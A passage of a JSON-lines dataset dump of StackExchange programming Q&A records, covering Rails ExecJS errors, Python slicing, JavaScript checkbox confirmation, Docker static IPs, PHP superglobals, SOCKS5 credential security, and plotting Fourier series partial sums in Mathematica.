\u0442\u043e\u043b\u044c\u043a\u043e \u0437\u0430\u043a\u043e\u043d\u0443.\" (http:\/\/www.hist.msu.ru\/ER\/Etext\/cnst1936.htm#9) This is about as clear as it gets... [Translation: \"The judges are independent and only obey the law.\"]\n","meta":{"source":"history.stackexchange","title":"How did a criminal trial in the Soviet Union work after World War 2?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Ruby on Rails ExecJS::RuntimeError in Pages#home\n\nQuestion: I generated a page using a controller. But when I go to the localhost:3000\/pages\/home. I got this error:\nExecJS::RuntimeError in Pages#home\n@RyanBigg Okay here is the full error code:\nExecJS::RuntimeError in Pages#home\n\nShowing C:\/Users\/Anishka\/Desktop\/test\/myfirstapp\/app\/views\/layouts\/application.html.erb where line #6 raised:\n\n (in C:\/Users\/Anishka\/Desktop\/test\/myfirstapp\/app\/assets\/javascripts\/pages.js.coffee)\nExtracted source (around line #6):\n\n3: \n4: Myfirstapp<\/title>\n5: <%= stylesheet_link_tag \"application\", :media => \"all\" %>\n6: <%= javascript_include_tag \"application\" %>\n7: <%= csrf_meta_tags %>\n8: <\/head>\n9: <body>\nRails.root: C:\/Users\/Anishka\/Desktop\/test\/myfirstapp\n\nApplication Trace | Framework Trace | Full Trace\napp\/views\/layouts\/application.html.erb:6:in `_app_views_layouts_application_html_erb__601430158_32305500'\nRequest\n\nParameters:\n\nNone\nShow session dump\n\nShow env dump\n\nResponse\n\nHeaders:\n\nNone\n<\/code>\nI found a solution from here ExecJS::RuntimeError on Windows trying to follow rubytutorial\nwhich is: \n\nThe Fix that worked for us: On the system having issues, find ExecJS's\n runtimes.rb file. It looks like this. Make a copy of the found file\n for backup. Open the original runtimes.rb for editing. Find the\n section that starts with the line JScript = ExternalRuntime.new(. In\n that section, on the line containing :command => \"cscript \/\/E:jscript\n \/\/Nologo \/\/U\", - remove the \/\/U only. Then on the line containing\n :encoding => 'UTF-16LE' # CScript with \/\/U returns UTF-16LE - change\n UTF-16LE to UTF-8 . Save the changes to the file. This section of the\n file should now read:\nJScript = ExternalRuntime.new(\n :name => \"JScript\",\n :command => \"cscript \/\/E:jscript \/\/Nologo\",\n :runner_path => ExecJS.root + \"\/support\/jscript_runner.js\",\n :encoding => 'UTF-8' # CScript with \/\/U returns UTF-16LE ) Next, stop then restart your Rails server and refresh the page in your\n browser that produced the original error. Hopefully the page loads\n without error now.\n\nBut where is the runtimes.rb file? I could not find anything like that. I'm rails beginner and your help will be appreciated, thanks. \nComment: ExecJS supports these runtimes:\n\n ` therubyracer - Google V8 embedded within Ruby\n therubyrhino - Mozilla Rhino embedded within JRuby\n Node.js\n Apple JavaScriptCore - Included with Mac OS X\n Microsoft Windows Script Host (JScript)`\nComment: did you install `therubyracer` gem\nComment: Please show us the full error message. You're missing a part of it from your post.\nComment: Hello, I'm using a simple package from here http:\/\/railsinstaller.org\/en\n\napart from that I've not installed anything else.\nComment: @RajarshiDas I'm using rails installer. It comes with all the things, I guess. but therubyracer gem is required? and how can I check if I've already installed that gem in my system? thanks.\nComment: @RyanBigg I posted the full error code above.\nComment: do cd rails_app && `bundle show therubyracer` or `gem list therubyracer`\nComment: @RajarshiDas you mean go to my app directory from cmd and then type bundle show therubyracer, right? I did that and it says: Could not find gem 'therubyracer'.\n\nAre you sure, I need that gem in my system? If yes, then how can I install it?\n\nAlso, where the gems stored? in folders? or they are stored in my app only?\n\nThanks for your help, I really appreciate it.\nComment: thats mean you did not install the rubyracer which will require please follow https:\/\/github.com\/hiranpeiris\/therubyracer_for_windows\nComment: @RajarshiDas I installed it using cmd but there is one more step, it says Copy v8.dll & v8preparser.dll in to ruby\\bin folder. Where is the ruby\/bin folder? I checked my app folders, it's not there!\nComment: @RajarshiDas I copied those dll files to C:\/Rails Installer\/Ruby\/bin folder. When I enter \"bundle show therubyracer\" it shows the same message - could not find gem. And when I use \"gem list therubyracer\" it shows this: *** LOCAL GEMS ***\n\ntherubyracer (0.11.0beta1 x86-mingw32)\n \nI stopped the rails server by using Ctrl+C and started again, refreshed the page but still shows the same error!\nComment: app\/assets\/javascripts\/ Please change the page extension pages.js.coffee to page.js.jsx\nAnswer: You need to change the command line ExecJS uses for cscript. This can be done in the gem's runtimes.rb file. For me, this was located in:\n\nC:\\Ruby200-x64\\lib\\ruby\\gems\\2.0.0\\gems\\execjs-2.0.2\\lib\\execjs\n\nNaturally, that'll be different depending on your version of Ruby and where it's installed.\nI found this workaround in a thread for an ExecJS issue.\nI changed this:\n<code>JScript = ExternalRuntime.new(\n :name => \"JScript\",\n :command => \"cscript \/\/E:jscript \/\/Nologo \/\/U\",\n :runner_path => ExecJS.root + \"\/support\/jscript_runner.js\",\n :encoding => 'UTF-16LE' # CScript with \/\/U returns UTF-16LE\n)\n<\/code>\nto this:\n<code>JScript = ExternalRuntime.new(\n :name => \"JScript\",\n :command => \"cscript \/\/E:jscript \/\/Nologo\",\n :runner_path => ExecJS.root + \"\/support\/jscript_runner.js\",\n :encoding => 'UTF-8' # CScript with \/\/U returns UTF-16LE\n)\n<\/code>\nThis screenshot is also from that thread:\n","meta":{"source":"stackoverflow","title":"Ruby on Rails ExecJS::RuntimeError in Pages#home","dup_signals":{}},"subset":"stackexchange"} +{"text":"Returning a sliced list\n\nQuestion: I am stuck on this question:\n\nWrite a function <code>lossy_merge(list_1, list_2)<\/code> that returns a new list\n containing all the elements of <code>list_1<\/code> except the last followed by all\n the elements of <code>list_2<\/code> except the first. \nYou may assume that both\n <code>list_1<\/code> and <code>list_2<\/code> contain at least one element. \n\nFor example:\nTesting the following:\n<code>ans = lossy_merge([10, 20, 30], [100, 200, 300])\n\nprint(ans) \n<\/code>\nShould give me: <code>[10, 20, 200, 300]<\/code>\nThe function I currently have: \n\n<code>def lossy_merge(list_1, list_2):\n \"\"\"returns list\"\"\"\n list1 = list_1[0:2]\n list2 = list_2[1:3]\n return list1 + list2<\/code>\n\nGives me <code>[10,20,200,300]<\/code> however, when testing with other ones like: \n<code>ans = lossy_merge([10], ['rhubarb'])\n\nprint(ans)\n<\/code>\nI get <code>[10]<\/code> instead of the expected <code>[]<\/code> \nWhat am I doing wrong? \nSorry, I'm new to Python 3 programming :\/\nAnswer: Slice the first list up to but not including the last item, slice the second starting at the second item up to the end of the second list. Remember the last item is index -1 and the second item is index 1 because counting in Python starts at zero.\n<code>return list_a[:-1] + list_b[1:]\n<\/code>\n","meta":{"source":"stackoverflow","title":"Returning a sliced list","dup_signals":{}},"subset":"stackexchange"} +{"text":"showing Confirm message when unchecking a checkbox in javascript\n\nQuestion: I want a message that reads \"are you sure?\" to display when the user tries to uncheck a checkbox. If they choose something like \"yes\", then uncheck it. If they choose \"no\", then leave as is. I'm fairly new to JavaScript and my attempt at this has prompted me with the error \"JavaScript runtime error: Unable to get property 'checked' of undefined or null reference\". Here is my Checkbox code:\n<code><div id=\"ChkBox\">\n <input style=\"margin: 5px; \" type=\"checkbox\" name=\"chkIsActive\" onchange=\"Areyousure('ChkBox')\" value=\"@Model.Pharmacy.IsActive\" @(Model.Pharmacy.IsActive ==\"True\" ? \"checked=\\\"checked\\\"\" : \"\") \/> Is Active\n<\/div>\n<script>\n Areyousure();\n<\/script>\n<\/code>\nand here is the function: \n<code>function Areyousure(id) {\n if (document.getElementById(id).checked == true) {\n return false;\n } else {\n var box = confirm(\"Are you sure you want to Uncheck this?\");\n if (box == true)\n return true;\n else\n document.getElementById(id).checked = true;\n }\n}\n<\/code>\nWhat can i do to fix this? Thanks in Advance!\nComment: I don't see any c#\/.NET related thing here.\nComment: Yea, sorry I was trying to add as many tags to try to get help faster. I'm new to this site.\nComment: @julianc Adding inappropriate tags often has the opposite result. People who find the question by *those* tags may downvote your question or vote to close.\nAnswer: You could consider passing in the element itself to avoid any issues with targeting it based on its <code>id<\/code> attribute using :\n<code>onchange='Areyousure(this);'\n<\/code>\nAnd then adjust your function accordingly to handle determine if the <code>checked<\/code> attribute should persist through the change or not :\n<code>function Areyousure(element) {\n \/\/ If it is checked now, let it be\n if (element.checked) {\n return false;\n \/\/ Otherwise prompt the user\n } else {\n \/\/ Prompt the user to make sure\n if (confirm(\"Are you sure you want to Uncheck this?\")){\n \/\/ The user confirmed it, so uncheck it\n return true;\n }else{\n \/\/ Otherwise, keep it checked\n element.checked = true;\n } \n }\n}\n<\/code>\nExample\n\n<code><div id=\"ChkBox\">\n <input style=\"margin: 5px; \" type=\"checkbox\" name=\"chkIsActive\" onchange=\"Areyousure(this)\" value=\"example\" checked \/>Is Active\n<\/div>\n<script>\n function Areyousure(element) {\n \/\/ If it is checked now, let it be\n if (element.checked) {\n return false;\n \/\/ Otherwise prompt the user\n } else {\n \/\/ Prompt the user to make sure\n if (confirm(\"Are you sure you want to Uncheck this?\")){\n \/\/ The user confirmed it, so uncheck it\n return true;\n }else{\n \/\/ Otherwise, keep it checked\n element.checked = true;\n } \n }\n}\n<\/script><\/code>\nComment: Thank You! One last thing though...the message pops up as soon as the page loads. How can I prevent this?\nComment: You are currently explicitly calling it via ``. Removing that should resolve it.\nComment: Got it! Thanks for everything.\nAnswer: Your method expects an ID but none is passed in:\nAdd to your input:\n<code><input id=\"chkIsActive\"\n<\/code>\nAnd change the script to call method to:\n<code><script>\n Areyousure(\"chkIsActive\");\n<\/script>\n<\/code>\nAnswer: Since you are finding the element by id (which is not defined), so javascript will not be able to find the html element.\nInstead you can edit your input tag to something like this;\n<code><input style=\"margin: 5px; \" type=\"checkbox\" name=\"chkIsActive\" onchange=\"Areyousure()\" value=\"@Model.Pharmacy.IsActive\" @(Model.Pharmacy.IsActive ==\"True\" ? \"checked=\\\"checked\\\"\" : \"\") \/>\n<\/code>\nAnd then instead of getting the element by Id, you can get it by name using:\n<code>document.getElementByName(\"chkIsActive\");\n<\/code>\nYou also need to change the function as no parameter will be passed to the function now.\nCheers :)\n","meta":{"source":"stackoverflow","title":"showing Confirm message when unchecking a checkbox in javascript","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to prevent aborting of thread due to app termination?\n\nQuestion: If a routine is running periodically by way of a <code>System.Threading.Timer<\/code>, what can be done to prevent this routine from being aborted mid-way due to the termination of the host application?\nComment: The timer is owned by the application; if the application terminates, so goes the timer. If your app is shut down gracefully, you could signal to the timer routine to clean up, but if someone force-aborts the app, there's not much you can do.\nComment: @Joe: would be there some way to allow the timer thread to carry on with its current iteration and then terminate?\nComment: @CJ7: if a part of application is not finished, the application is not finished too, by definition.\nComment: @Vlad: whether the application is technically 'finished' is not my concern. What I need is to prevent the timer routine from being interrupted because it may not complete necessary database updates etc. I don't mind if this runs on after the host app appears to have terminated.\nComment: What if someone pulls the plug? You should be prepared for the possibility that things terminate before everything you expect to finish, finish. In the normal termination case, you should be able to signal your timer thread to wrap things up immediately.\nComment: See http:\/\/stackoverflow.com\/a\/9062414\/327528\nAnswer: Well, you cannot possibly do anything if the application is terminating; however you can prevent the implicit application termination by exit from <code>main<\/code> (closing the main window, etc.) if you open a non-background thread.\nYou can make the timer to run at that thread, however you cannot do it with <code>System.Threading.Timer<\/code>, as it runs on thread pool threads (which are background ones). You can e. g. start a dispatcher on that thread and run a <code>DispatcherTimer<\/code> (if you are using WPF).\nAnswer: This code should cause the main thread to block for 10 seconds waiting for any queued timer callbacks to finish. This can be run at the exit point of the host application.\n<code>Dim waitHnd As WaitHandle = New AutoResetEvent(False)\nTimer1.Dispose(waitHnd)\nwaitHnd.WaitOne(10000)\n<\/code>\nAnswer: There is no way to guarantee that your thread won't be terminated abnormally. Any number of things can go wrong: an unexpected power failure, user terminating the application with Task Manager, or a bug in your program that crashes the thread are just three possibilities.\nIf you're doing a multi-stage database update that, if interrupted, would leave your database in a corrupted or inconsistent state, then you should be using transactions.\n","meta":{"source":"stackoverflow","title":"How to prevent aborting of thread due to app termination?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How do I change image and after rerunning the main activity in the thread after 5 sec not go back to the basic layout in android\n\nQuestion: So I am creating an app where I get the string from my <code>AsyncTask<\/code> which I have created as a subclass in my <code>MainActivity<\/code> class in order to get the variables I receive from the internet. And according to variables I get I change the images accordingly after every 5 seconds. Now the task is successful but on activity refresh I keep getting the default layout I created in <code>activity_main.xml<\/code> and again it changes to the one I want. \nPosting my code below.\n<code>Thread thread = new Thread() { \/\/thread I am running every 5 secs\n @Override\n public void run() {\n try {\n synchronized (this) {\n wait(5000);\n syncapp sa = new syncapp(); \/\/AsyncTask to get String from Internet\n sa.execute();\n }\n } catch (InterruptedException e) {\n e.printStackTrace();\n }\n Intent mainActivity = new Intent(getApplicationContext(), MainActivity.class); \/\/Creating intent to restart the activity (Need a workaround if possible)\n startActivity(mainActivity);\n }\n\n ;\n };\n thread.start();\n\n}\npublic void setImage(String str) \/\/Function I will call to change Image\n {\n vacancy =0;\n b = a.toCharArray();\n for (int i = 0; i < 6; i++)\n if (b[i] == '0'){\n iv[i].setImageResource(R.drawable.img2);\n vacancy++;}\n else if (b[i] == '1') {\n iv[i].setImageResource(R.drawable.img1);\n }\n Log.i(\"abc \", a);\n tv.setText(\"InBackGround\" + str);\n }\nprotected void onSaveInstanceState(Bundle outState) {\n super.onSaveInstanceState(outState);\n \/* for(int i =0;i<6;i++) {\n outState.putChar(\"imv\"+(i+1), b[i]);\n }*\/\n outState.putString(\"a\",a); \/\/Getting a from the internet (php file)\n Log.i(\"Saved State\", \"Activity A - Saving instance state\");\n}\n<\/code>\n\nNow what I want is if you have a better method to do this thing. Eg. In a Stock market application the prices keep on changing. The same way I want my image to change according to the data I get.\nIf this is the only method then how do I save changes I make\n(eg. like in the code above <code>setImageResource<\/code> to img2) permanently.\nIf I can use something else ImageView.\n\nI have already used <code>onSaveInstanceState<\/code> But as I am taking values from the internet I don't know I am not able to use them.\nAnswer: So first of all.. when working with UI elements such as Views, Widgets, you would want to avoid spawning your own threads, as View can be touched only from the thread it was created from. \nSecond.. you would also want to avoid sleeping inside your worker thread - basically just use the Handler class (from android.os) and post a delayed Runnable, like so: https:\/\/stackoverflow.com\/a\/20784353\/2102748. Just be sure to stop all work on that particular handler when your Activity stops, like so: https:\/\/stackoverflow.com\/a\/3627399\/2102748\nThird - you should perhaps load the photo immediately (on the same AsyncTask or thread) if that is the only thing you need, but be sure to post the \"set bitmap to view\" work to the handler you created.\nHope this helps.\n","meta":{"source":"stackoverflow","title":"How do I change image and after rerunning the main activity in the thread after 5 sec not go back to the basic layout in android","dup_signals":{}},"subset":"stackexchange"} +{"text":"Are SOCKS5 credentials safe during authentication on proxy server\n\nQuestion: I've read several tutorials, but not totally sure.\nIf I'll set up my own SOCKS5 proxy server on VPS, configure it to use username and password. Will this credentials be safe while authentication on proxy via public wi-fi for example?\nIf no, how it works for paid proxy providers?\nI know about VPN and SSH-tunneling. But I think they are too complicated for using on mobile devices and also leads to additional power consumption for keeping connections alive.\nAnswer: Neither traffic nor credentials are encrypted in the SOCKS5 protocol. From RFC 1929:\n\nThis document describes a subnegotiation that provides authentication services to the SOCKS protocol. Since the request carries the password in cleartext, this subnegotiation is not recommended for environments where \"sniffing\" is possible and practical.\nComment: Is it not possible to use SSL\/TLS with SOCKS, like it is possible to do with FTP? Otherwise if you own the SOCKS proxy, an alternative is to allow only authentication from your own IP address and run the SOCKS proxy server only when needed (to limit risks of unauthorized access in case someone on the same local or mobile network uses the same IP address as you). Another solution which could be combined would be to create a temporary random password that is invalidated after login (in case it is intercepted on a local network) but I had to do a request every 30 seconds to keep connection alive.\nComment: @baptx You could certainly encase it in TLS, but then it'd no longer be SOCKS.\nAnswer: SOCKS5 is a transport protocol and by itself it is not encrypted. Requests transmit the credentials in plain text which is considered a security bad practice.\nVPN software on a mobile phone would be the easiest thing to consider as an alternative in my opinion. Just enable the VPN when ever you need it.\n","meta":{"source":"security.stackexchange","title":"Are SOCKS5 credentials safe during authentication on proxy server","dup_signals":{}},"subset":"stackexchange"} +{"text":"Zend_Tool multiple .zfproject.xml\n\nQuestion: I need to create custom folder to put multiple applications and get Zend_Tool to working:\n<code>applications \n|- frontend\n |- configs\n |- controllers\n |- models\n |- tests\n |- views\n |- .zfproject.xml\n |- Bootstrap.php\n|- backend\n |- configs\n |- controllers\n |- models\n |- tests\n |- views\n |- .zfproject.xml\n |- Bootstrap.php\nsystem\npublic\ndocs\n<\/code>\nHow to get this?\nAnswer: use <code>create module<\/code> command\n<code>zf create module frontend\nzf create module backend\n<\/code>\nAfter it your folder structurer will be following. \n<code>applications\n configs \n controllers \n models \n modules \n |- frontend\n |- configs\n |- controllers\n |- models\n |- tests\n | - views \n |- Bootstrap.php\n |- backend\n |- configs\n |- controllers\n |- models\n |- tests\n |- views \n |- Bootstrap.php\n views \nsystem\npublic\ndocs\n<\/code>\nI think it is good structure for project. Also you can use default module as a front end or backend.\n","meta":{"source":"stackoverflow","title":"Zend_Tool multiple .zfproject.xml","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to assign multiple static IPs to docker container\n\nQuestion: I am able to run a docker container and assign one static IP using this command\n<code>docker run -it --name container1--net ProdNetwork --ip 10.1.1.100 centos:latest \/bin\/bash\n<\/code>\nI couldn't figure out how to assign multiple static IP's to one container, can someone help. \nAnswer: That was requested before.\nOne possible solution\/woraround is to deploy 3 containers:\n\n2 NGiNX containers, each with their own static IP, reverse-proxying to the third container (see \"nginx redirect to docker container\")\nyour third container, with its own internal private IP with a swarm network, which will receive the queries addressed to one of the two other NGiNX containers.\n\nThis might be more straightforward than trying to add another network route to a given container.\nComment: @user1550159 \" maintenance becomes very hard\": not necessarily: https:\/\/github.com\/jwilder\/nginx-proxy\nComment: Thank Von, i saw nginix work around, but my secnario is to HOST at least 15 SSL sites on windows container.Routing through reverse proxy to that many sites is complex and maintenance becomes very hard.\nComment: @user1550159 In the same idea: traefik: https:\/\/github.com\/containous\/traefik (https:\/\/medium.com\/@lukastosic\/traefik-docker-reverse-proxy-and-much-much-more-a39b24b9d959)\nAnswer: Spin a new windows container (I used nano server) and run the following command in the container shell to add multiple static addresses:\n<code>New-NetIPAddress \u2013InterfaceIndex 2 \u2013IPAddress 172.31.2.3 -PrefixLength 24\n<\/code>\nReference:\nhttps:\/\/forums.docker.com\/t\/how-to-host-multiple-websites-with-different-ip-s-in-iis-container\/46985\/4\n","meta":{"source":"stackoverflow","title":"How to assign multiple static IPs to docker container","dup_signals":{}},"subset":"stackexchange"} +{"text":"PHP $_GET\/$_POST via variable variables\n\nQuestion: I'm attempting to dynamically access both the $_GET and $_POST arrays, among others, using variable variables. The reason I'm trying to do this is so that I can perform similar actions on multiple arrays without needing to declare specific iterations for each. I'm reasonably sure this is possible, as PHP's documentation says it is able to use variable variables to dynamically access an array, however I'm unable to get it to work. A simple demonstration is when I'm attempting to verify that a certain property has been set.\n<code>if(isset(${$this->_array}[$property])) { return ${$this->_array}[$property]; }\nelse { return null; }\n<\/code>\nWhen I run the above script I always get null, however when I statically seek the desired property, manually using $_GET or $_POST, I get the desired outcome. I have triple checked <code>$this->_array<\/code> and <code>$property<\/code> and they are returning the correct string values. Are these arrays unavailable for such access, or am I doing something wrong?\nComment: http:\/\/en.wikipedia.org\/wiki\/Code_smell\nComment: @ceejayoz: OK? Heard of it before, familiarized myself with the concept. What are you trying to say? That my code is wrong somewhere else? I've already determined that the variables being passed to the above statement are correct. Not sure what else it could be.\nComment: I'm trying to say that using variable variables is usually a sign that you're doing something wrong. There's almost always a better way that won't make subsequent developers want to kill you.\nComment: Alright, I didn't realize variable variables were such taboo, this was my first experience with them. I'll be sure to keep them out of future code :)\nAnswer: Superglobals (such as <code>$_POST<\/code>) can not be used as variable variables within functions.\nYou could say something like <code>$post = $_POST;<\/code> and then use <code>'post'<\/code> and it'd work, but directly using <code>'_POST'<\/code> won't.\nAnswer: Superglobals cannot be referenced as variable variables inside of classes or methods, so this will work:\n<code><?php\n$var = \"_GET\";\nprint_r(${$var});\n<\/code>\nBut this will not:\n<code><?php\ntest();\nfunction test() {\n $var = \"_GET\";\n print_r(${$var});\n}\n<\/code>\nI suspect that there is a better way to do what you are trying to accomplish.\nhttp:\/\/php.net\/manual\/en\/language.variables.superglobals.php#refsect1-language.variables.superglobals-notes\nComment: Not when not even this worked. I did try just printing the whole array, forgot to mention that. Thanks though\nComment: My code did work. I updated my answer to explain why it didn't work for you.\nAnswer: Whatever you're doing wrong, using variable variables is probably making it worse. For your own sanity, please stop. They should never be deployed in production code under any circumstances. They're impossible to debug, and using them in your code is like trying to read something that someone else wrote with their feet. If they have particularly dexterous feet, then perhaps you can understand what they're doing. But 99.9999% of the time, it is better to just use normal arrays.\nThat being said, try <code>$_REQUEST<\/code> instead.\nAnswer: There's already an array that contains both <code>$_GET<\/code> and <code>$_POST<\/code>. It's named <code>$_REQUEST<\/code>. Having said that, it can also contain the contents of <code>$_COOKIE<\/code> depending on the <code>request_order<\/code> setting, but the default is just <code>$_GET<\/code> and <code>$_POST<\/code>.\nAnswer: You say you want to access <code>both the $_GET and $_POST arrays, among others<\/code> -- what are these 'others'? You can use <code>$_REQUEST<\/code> to check the contents of <code>$_GET<\/code>, <code>$_POST<\/code>, and <code>$_COOKIE<\/code> all at once.\nAnswer: you can do this but dont know if it is a good coding practice\n<code>if( $_SERVER['REQUEST_METHOD'] == 'POST' ) {\n $method = '_POST';\n }\n else {\n $method = '_GET';\n }\n $data = $$method;\n<\/code>\nAnswer: You can create an associative array that references both arrays, and use that.\n<code>$params = [\n '_GET' => $_GET,\n '_POST' => $_POST\n];\n<\/code>\nThen you can use\n<code>return $params[$this->_array][$property] ?? null;\n<\/code>\n","meta":{"source":"stackoverflow","title":"PHP $_GET\/$_POST via variable variables","dup_signals":{}},"subset":"stackexchange"} +{"text":"Remove Underline on Hover\n\nQuestion: I've tried everything I could to remove the underline that appears when hovering over a product title on my Shopify. Any css suggestions as to how I can remove this underline anywhere that a product title appears?\nThank you!!!\nComment: Can you provide code or link to the issue?\nComment: Hey @MinalChauhan ! Right now it looks like the code that is on our Shopify's theme.scss for text links is: \n .text-link {\n display: inline;\n border: 0 none;\n background: none;\n padding: 0;\n margin: 0; }\n\n.text-link--accent {\n color: var(--color-btn-primary);\n border-bottom: 1px solid currentColor;\n padding-bottom: 1px; }\n .text-link--accent:not([disabled]):hover, .text-link--accent:focus {\n color: var(--color-btn-primary-focus); }\nAnswer: <code>**Try these two**\n\na:link {\n text-decoration: none;\n}\n\na:hover {\n text-decoration: underline;\n}\n<\/code>\nComment: hm for some reason that didn't seem to work, i tried something like that earlier and it still wouldn't budge\nAnswer: Yeah. I had encountered this issue before. Just use below code snippet:\n<code>.site-nav__link:hover span.site-nav__label { border-bottom: none; }<\/code>\nFrom my code snippet. Just replace it with your div\nComment: i just replaced my div with that code snippet but it didn't seem to change the underline when you hover. Is it possible to have this only function for a specific type of link, aka when you hover over a product title?\nComment: Yes. You just have to add a function for the hyperlink of that respective div of the product title. Still, if it has not worked just upload your code on codepen and share the link.\nComment: would it be enough to copy and paste the entire theme.css file on there for you to take a peak at it?\n","meta":{"source":"stackoverflow","title":"Remove Underline on Hover","dup_signals":{}},"subset":"stackexchange"} +{"text":"Changing input value while retaining original value\n\nQuestion: So I'm trying to do something that I don't necessarily think is the best practice from a UI standpoint(not by my choice) and change the value of the input after the user types it in. \nThe input field looks like this: \n<code><td><input type=\"text\" pattern=\"[0-9]*\" name=\"number1\" id=\"number1\" class=\"currency\"> \/ LUNA study<\/td>\n<\/code>\nand the JS to change it looks like this:\n<code> var number1 = strToNumber($(\"#number1\").val());\n var number1_calc = number1 +(calc_value * 0.1);\n\n $(\"#number1\").focusout(function(){\n $(\"#number1\").val(formatCurrency(Math.round(number1_calc)));\n });\n<\/code>\nThis portion of the code works how I want it to, the place I end up running into problems is when I need to use the calculated value for a different equation:\n<code>var number_total = number2 * number1_calc;\n<\/code>\nRight now I have the calculations setup to run on any change made in any input. So what ends up happening is after the focusout changes the value of the input, the next time the calculations are ran through it takes the new input value instead of the old. \nHere is a JSFiddle of what im trying to do. As you can see the number_total is updated on the change made to number_1 as soon as you enter something into number2, and this is what I want to stop.\nComment: how about a simplified js fiddle? looks to me like you should use jQuerys `change()` function\nComment: We could definitely use some more code here. As @Sionnach733 mentioned, you might want to use `$('#number1').on('change', function(){})` instead of `focusout()`\nComment: I just added a jsfiddle of my problem\nComment: Is this what you want http:\/\/jsfiddle.net\/hJ7jT\/2\/ ?\nAnswer: I'm not sure I understand your question\/scenario very well, but if you want to retain the originally entered value then you could use jQuery's .data() to associate that original value with the input element:\n<code>$('#number1').on('blur', function() {\n $(this).data('original-value', this.value);\n});\n<\/code>\nThen, in your calculation function that runs on changes to any input, reference <code>$('#number1').data('original-value')<\/code> instead of <code>.val()<\/code>.\nComment: Thanks for the advice, but I'm not sure if this will do the trick. Here is a [JSFiddle](http:\/\/jsfiddle.net\/fX9XE\/1\/) of the problem I'm experiencing. If you take a look you can see that it updates the total based on the changed number1 when I input something into number2, which I dont want it to do.\nComment: So, what you're saying is that calc_value should affect the display of number1, but should not affect the number_total?\nComment: Maybe, if you go through the form entering one at the time, you will see after entering calc_value and number1 the total_value displays the value I want. But then when you go to number2 and enter a value, total_value changes. This is because it is running through the change(function again and is recalculating number1_calc based on the changed number1 value.\nComment: Something like this is what I had in mind, using .data() to keep a hidden cache of the unmodified number1 value: http:\/\/jsfiddle.net\/fX9XE\/3\/\n","meta":{"source":"stackoverflow","title":"Changing input value while retaining original value","dup_signals":{}},"subset":"stackexchange"} +{"text":"Plotting Partial Sums of Fourier Series\n\nQuestion: I'd like to plot some partial sums for a Fourier Series problem, but I am not sure if the output I am getting is correct. I want to be able to plot the partial sums and the function on the same graph. Here is something that I attempted.\n<code> s[n_, x_] := 8\/4 + 3\/(9 \u03c0) Sum[(6 (-1)^k)\/(k \u03c0) \n Cos[(k \u03c0 x)\/2] + (16 (-1)^k + 13)\/(\u03c0 k) \n Sin[(k \u03c0 x)\/2],{k, 0, n}]\n\n partialsums = Table[s[n, x], {n, 1, 5}];\n\n f[x_] = Piecewise[{{-x^3-2x,-2 < x < 0},{-1+x,0<= x <= 2}}]\n\n Plot[Evaluate[partialsums], {x, -4 Pi, 4 Pi}]\n<\/code>\nAny ideas about the best method to tackle something like this?\nComment: There's a k in the denominator of the sum (actually, two) and your index for k goes from 0 to n, so the sum is always indeterminate.\nComment: @DavidSkulsky: Should it be `{k,1,n}`. I actually only want to plot a certain amount of partial sums. Does this number go where the `n` is located?\nComment: Once you fix the sum, you should be able to plot what you want by just doing Plot[Append[partialsums,f[x]],{x,-4 Pi, 4 Pi}].\nAnswer: In the definition of <code>s<\/code> you're summing from <code>k==0<\/code>. Since the summand has a term <code>1\/k<\/code> this gives a divide-by-zero error when calculating the partial sums. The sum should in fact start from <code>k==1<\/code> (the zeroth coefficient is taken care of by the constant term in front of the sum). The first few approximations then look like\n<code>s[n_, x_] := \n 8\/4 + 3\/(9 \u03c0) Sum[(6 (-1)^k)\/(k \u03c0) Cos[(k \u03c0 x)\/\n 2] + (16 (-1)^k + 13)\/(\u03c0 k) Sin[(k \u03c0 x)\/2], {k, 1, n}]\n\npartialsums = Table[s[n, x], {n, 1, 5}];\nPlot[Evaluate[partialsums], {x, -4, 4}]\n<\/code>\n\nTo compare this with <code>f<\/code> we plot the <code>s[5,x]<\/code> and <code>f<\/code> in the same plot:\n<code>Plot[{s[5, x], f[x]}, {x, -2, 2}]\n<\/code>\n\nwhich doesn't seem right to me, so I suspect you made a mistake somewhere in calculating the coefficients.\nCalculating coefficients by hand\nWe could use <code>FourierSeries<\/code> to calculate the partial sums, but this is very slow, and doesn't give produce the general equation for the coefficients. Therefore it's better to calculate the coefficients by hand. The $n$-th coefficient can be calculated according to\n<code>coeff[0] = 1\/4 Integrate[f[x], {x, -2, 2}];\ncoeff[n_] = 1\/4 Integrate[f[x] Exp[I Pi n x\/2], {x, -2, 2}]\n<\/code>\n\n<code>(1\/(2 n^4 \u03c0^4))E^(-I n \u03c0) (-48 + 48 E^(I n \u03c0) - \n 48 I n \u03c0 + 28 n^2 \u03c0^2 - 6 E^(I n \u03c0) n^2 \u03c0^2 + \n 2 E^(2 I n \u03c0) n^2 \u03c0^2 + 12 I n^3 \u03c0^3 - \n I E^(I n \u03c0) n^3 \u03c0^3 - I E^(2 I n \u03c0) n^3 \u03c0^3)\n<\/code>\n\nThen the partial sums are given by\n<code>series[m_, x_] := Sum[Exp[-I Pi n x\/2] coeff[n], {n, -m, m}]\n<\/code>\nPlotting the first few approximations:\n<code>Plot[Evaluate[Table[series[j, x], {j, 0, 5}]], {x, -6, 6}]\n<\/code>\n\nTo see how this compares with the original function <code>f<\/code>:\n<code>Plot[Evaluate[{series[5, x], f[Mod[x, 4, -2]]}], {x, -4, 4}]\n<\/code>\n\nwhich looks a lot better than the before.\nEdit: Real coefficients\nHere, <code>coeff[n]<\/code> are the coefficients for the Fourier series in exponential form, but these can be easily converted to the coefficients for the $\\cos$ and $\\sin$ series, <code>a_n<\/code> and <code>b_n<\/code>, by doing something like\n<code>a[0] = coeff[0];\na[n_] = Simplify[ComplexExpand[coeff[n] + coeff[-n]]];\nb[n_] = Simplify[ComplexExpand[I (coeff[n] - coeff[-n])]];\n<\/code>\nComment: Thanks, This is a very interesting way or technique of doing this. I also like that about how to covert back and forth between the exponential form and the trigonometric forms. That will be very useful. :). Very neat and organized approach.\nAnswer: You can use <code>FourierCoefficient<\/code> to pre-calculate the Fourier coefficients to arbitrary degree and then use the result very effectively.\nThere may be some issues with zero-th degree, therefore I excluded this using <code>Piecewise<\/code>. Here's the main code block:\n<code>f[x_] := Piecewise[{\n {-x^3 - 2 x, -2 < x < 0},\n {-1 + x, 0 <= x <= 2}},\n 0\n];\n Module[{x, fp},\n (* Set parameters so that the integration runs\n from -2 to 2 *)\n fp = {0, -Pi\/2};\n fc = 